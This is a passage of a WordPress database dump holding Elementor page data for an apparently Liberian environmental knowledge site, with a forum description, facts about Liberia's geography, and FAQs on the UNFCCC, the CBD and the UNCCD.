Progress)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0b86316\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63922e0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"290de68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b642c4\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(16787,2517,'_elementor_edit_mode','builder'),(16788,2517,'_elementor_template_type','wp-page'),(16789,2517,'_elementor_version','2.7.5'),(16790,2517,'_wp_page_template','default'),(16791,2517,'_elementor_data','[{\"id\":\"95f98b3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee80c4d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"968c8cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ea47e9d\",\"elType\":\"widget\",\"settings\":{\"title\":\"The EKMS Community Forum\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"69279a1f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"694b50b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2402f320\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9e3451\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and\\/or topics of the Rio Conventions implementation in Liberia.<\\/p>\\n<p>\\nGenerally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/feed\\\" target=\\\"_blank\\\">Click here<\\/a>.<\\/p>\\n<p>\\nThe key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues\\/questions relating to the Rio Conventions implementation in Liberia.\\n<\\/p>\\n<p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia.  Discussion is by all means restricted to registered users only. If you are already a member of the EKMS community, please <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\\\" target=\\\"_blank\\\">Sign In<\\/a> or <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/?autojoin=1\\\" target=\\\"_blank\\\">Join Us!<\\/a><\\/p>\\n<p>\\n<strong>Added Tools to the Community:<\\/strong>\\n<\\/p>\\n<p>Members Chat (Activated)<\\/p>\\n<p>Group Chatting (In Progress)<\\/p>\\n<p>Group online meetings hosting or Video Conferencing (In Progress)<\\/p>\\n<p>Events Setup (In Progress)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0b86316\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63922e0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"290de68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b642c4\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(16792,2517,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:1;}}}}}'),(16794,2503,'ocean_post_layout','full-width'),(16795,2451,'_ca_post_type','76'),(16796,2518,'_elementor_edit_mode','builder'),(16797,2518,'_elementor_template_type','wp-page'),(16798,2518,'_elementor_version','2.7.5'),(16799,2518,'_wp_page_template','default'),(16800,2518,'_elementor_data','[{\"id\":\"1872628\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b20d6bb\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c40d80d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1b2428a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/seal.png\",\"id\":440},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"90\",\"height\":\"90\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0a34da5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Republic of Liberia\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f41b210\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia is a relatively small country located within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean.<span style=\\\"font-family: Laila; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">\\u00a0<\\/span><span style=\\\"font-size: 16px;\\\">In terms of land area, Liberia\\u00a0<\\/span><span style=\\\"font-family: Laila; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">\\u00a0is\\u00a0<\\/span><span style=\\\"font-family: Laila; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">approximately 111,369 km2 and <\\/span><span style=\\\"font-size: 16px;\\\">is the fifth smallest country in Africa.<\\/span><\\/p><p>The extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4\\u00b021\\u2018N and 8\\u00b033\\u2018 north of the equator and longitudes 11\\u00b028\\u2018W and 7\\u00b032\\u2018W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.<\\/p><p>The perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. C\\u00f4te d\\u2018Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with C\\u00f4te d\\u2018Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.<\\/p><p>Liberia\\u2018s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(16801,2518,'_elementor_controls_usage','a:5:{s:5:\"image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:5:\"image\";i:1;s:10:\"image_size\";i:1;s:22:\"image_custom_dimension\";i:1;s:5:\"align\";i:1;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:2:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:10:\"text_color\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:1;}}}}}'),(16803,76,'ocean_post_layout','left-sidebar'),(16804,335,'_edit_lock','1628663729:38'),(16805,2519,'_elementor_controls_usage','a:0:{}'),(16806,2519,'_wp_page_template','default'),(16807,2519,'_elementor_edit_mode','builder'),(16808,2519,'_elementor_template_type','wp-page'),(16809,2519,'_elementor_version','2.7.5'),(16810,2519,'_elementor_data','[{\"id\":\"81604c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"635073e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"20a0238\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"heading_color\":\"#196819\",\"color_text\":\"#000000\",\"color_link_hover\":\"#114511\"},\"elements\":[{\"id\":\"3b455ed\",\"elType\":\"widget\",\"settings\":{\"title\":\"GENERAL \",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c396810\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the EKMS?\",\"tab_content\":\"<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the EPA and twelve other Liberian government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education. It also focuses on the three RIO conventions; United Nations Framework on Climate Change, United Nations Convention to Combat Desertification, and United Nations Convention on Biodiversity. <\\/p>\",\"_id\":\"eb92a21\"},{\"tab_title\":\"How many institutions are involved?\",\"tab_content\":\"<p>There are 12 national institutions involved;<br \\/>Forest Development Authority (FDA)<br \\/>Ministry of Agriculture (MOA)<br \\/>Central Agriculture Research Institute (CIRA)<br \\/>Liberia Land Authority (LLA)<br \\/>National Fisheries and Aquaculture Authority (NFAA)<br \\/>Liberia Maritime Authority (LMA)<br \\/>Ministry of Mines and Energy (MME)<br \\/>Ministry of Public Works (MoPW)<br \\/>Ministry of Internal Affairs (MIA)<br \\/>Liberia Bureau of Concessions<br \\/>Ministry of Gender<br \\/>Liberia Institute of Statistics and Geo-Information Services (LISGIS)<\\/p>\",\"_id\":\"044d49e\"},{\"tab_title\":\"Accordion Title\",\"tab_content\":\"Accordion Content\",\"_id\":\"bc9c821\"}],\"icon_color\":\"#000000\",\"content_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49d848d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"396f528\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"30a8e68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3d1091e\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNFCCC\",\"title_color\":\"#126b37\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2aefce2\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"When should I accredit myself for UNFCCC meetings?\",\"tab_content\":\"<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.<\\/p>\",\"_id\":\"a4d8544\"},{\"tab_title\":\"I want to get graphs and data about climate change. What is available and can I use it?\",\"tab_content\":\"<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.<\\/p>\",\"_id\":\"3148a01\"},{\"tab_title\":\"Are UNFCCC meetings open to the general public?\",\"tab_content\":\"<p>No, each participant must be properly accredited and registered.<\\/p>\",\"_id\":\"872f5c5\"},{\"tab_title\":\"Who can participate in UNFCCC meetings and how do they accredit themselves?\",\"tab_content\":\"<p>There are different participation groups at UNFCCC meetings; these include:<\\/p><ol><li><p><strong>Government delegate<\\/strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and\\/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/parties_observers\\/parties\\/national_focal_points\\/items\\/9336.php\\\">National Focal Point<\\/a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.<\\/p><\\/li><li><p><strong>Observers<\\/strong>\\u00a0from admitted\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-ngos\\\" target=\\\"_self\\\">non-governmental<\\/a>\\u00a0or\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-igos\\\" target=\\\"_self\\\">intergovernmental<\\/a>\\u00a0organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the\\u00a0<a href=\\\"https:\\/\\/onlinereg.unfccc.int\\/\\\">online registration system<\\/a>\\u00a0(ORS). Please see the\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/overview\\\" target=\\\"_self\\\">civil society<\\/a>\\u00a0web page for more information.<\\/p><\\/li><li><p><strong>Observer<\\/strong>\\u00a0from a United Nations organization or specialized agency. Nominations are received from the respective organization.<\\/p><\\/li><li><p><strong>Member of the press<\\/strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/press\\/calender_of_events\\/accreditation\\/items\\/2987.php\\\">accreditation section<\\/a>.<\\/p><\\/li><\\/ol>\",\"_id\":\"34ce7e2\"},{\"tab_title\":\"What is the purpose of the UNFCCC?\",\"tab_content\":\"<p>The\\u00a0UN Framework Convention on Climate Change\\u00a0(UNFCCC) is an intergovernmental treaty developed to address the problem of\\u00a0climate change.<\\/p>\",\"_id\":\"5364766\"},{\"tab_title\":\"What is climate neutrality?\",\"tab_content\":\"<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth\'s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.<\\/p>\",\"_id\":\"2cf3095\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"034d9e3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f12a46\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"00a6661\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e527259\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCBD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e0f30fd\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the UNCBD?\",\"tab_content\":\"<p>The\\u00a0Convention on Biological Diversity\\u00a0(CBD)\\u00a0is\\u00a0an international legally-binding treaty with three main goals: conservation of\\u00a0biodiversity; sustainable use of\\u00a0biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.<\\/p>\",\"_id\":\"76b731c\"},{\"tab_title\":\"What is conservation of biodiversity?\",\"tab_content\":\"<p>Conservation of biological diversity\\u00a0leads to\\u00a0conservation\\u00a0of essential ecological\\u00a0diversity\\u00a0to preserve the continuity of food chains. The genetic\\u00a0diversity\\u00a0of plants and animals is preserved. Biodiversity conservation\\u00a0serves as an insurance policy for the future.<\\/p>\",\"_id\":\"fc56846\"},{\"tab_title\":\"What is the need of conducting a biodiversity meet?\",\"tab_content\":\"<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.<\\/p>\",\"_id\":\"1c0b9e0\"},{\"tab_title\":\"How can we protect and preserve biodiversity?\",\"tab_content\":\"<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and\\u00a0protect\\u00a0beaches, parks, reserves, and fields where wild plants and animals live.<\\/p>\",\"_id\":\"b0638cd\"},{\"tab_title\":\"What are some factors that affect biodiversity?\",\"tab_content\":\"<p>The loss of\\u00a0biodiversity affects the lives of more than 1 billion people living in dry lands.<br \\/>5 major threats to biodiversity;<br \\/>Climate change<br \\/>Deforestation and habitat loss<br \\/>Over-exploitation<br \\/>Invasive species<br \\/>Pollution<\\/p>\",\"_id\":\"45db245\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e9a9393\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f33106f\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81f02fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"971e22b\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCCD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fefb411\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the importance of the UNCCD?\",\"tab_content\":\"<p>The\\u00a0United Nations Convention to Combat Desertification\\u00a0in Those\\u00a0Countries\\u00a0Experiencing Serious Drought and\\/or\\u00a0Desertification, Particularly in Africa (UNCCD) is a\\u00a0Convention to combat desertification\\u00a0and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by\\u00a0<span style=\\\"color: #222222; font-family: georgia, palatino, serif; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">international cooperation and partnership arrangements.<\\/span><\\/p>\",\"_id\":\"9661246\"},{\"tab_title\":\"Is the UNCCD legally binding?\",\"tab_content\":\"<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management<\\/p>\",\"_id\":\"da9b208\"},{\"tab_title\":\"What is desertification?\",\"tab_content\":\"<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.<\\/p>\",\"_id\":\"c71b5f6\"},{\"tab_title\":\"Why is it important to combat desertification?\",\"tab_content\":\"<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land\'s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined - are at risk of being displaced as a consequence of desertification.<\\/p>\",\"_id\":\"1275d06\"},{\"tab_title\":\"Is desertification a global problem?\",\"tab_content\":\"<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth\'s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world\'s poorest in over one hundred countries are threatened.<\\/p>\",\"_id\":\"0f255fe\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false}]'),(16812,2520,'_elementor_controls_usage','a:0:{}'),(16813,2520,'_wp_page_template','default'),(16814,2520,'_elementor_edit_mode','builder'),(16815,2520,'_elementor_template_type','wp-page'),(16816,2520,'_elementor_version','2.7.5'),(16817,2520,'_elementor_data','[{\"id\":\"81604c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"635073e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"20a0238\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"heading_color\":\"#196819\",\"color_text\":\"#000000\",\"color_link_hover\":\"#114511\"},\"elements\":[{\"id\":\"3b455ed\",\"elType\":\"widget\",\"settings\":{\"title\":\"GENERAL \",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c396810\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the EKMS?\",\"tab_content\":\"<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other\\u00a0 Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.<\\/p><p>It focuses on how the Rio conventions are being implementation in Liberia.<\\/p>\",\"_id\":\"eb92a21\"},{\"tab_title\":\"How many institutions are involved?\",\"tab_content\":\"<p>There are 12 national institutions involved;<br \\/>Forest Development Authority (FDA)<br \\/>Ministry of Agriculture (MOA)<br \\/>Central Agriculture Research Institute (CIRA)<br \\/>Liberia Land Authority (LLA)<br \\/>National Fisheries and Aquaculture Authority (NFAA)<br \\/>Liberia Maritime Authority (LMA)<br \\/>Ministry of Mines and Energy (MME)<br \\/>Ministry of Public Works (MoPW)<br \\/>Ministry of Internal Affairs (MIA)<br \\/>Liberia Bureau of Concessions<br \\/>Ministry of Gender<br \\/>Liberia Institute of Statistics and Geo-Information Services (LISGIS)<\\/p>\",\"_id\":\"044d49e\"},{\"tab_title\":\"Accordion Title\",\"tab_content\":\"Accordion 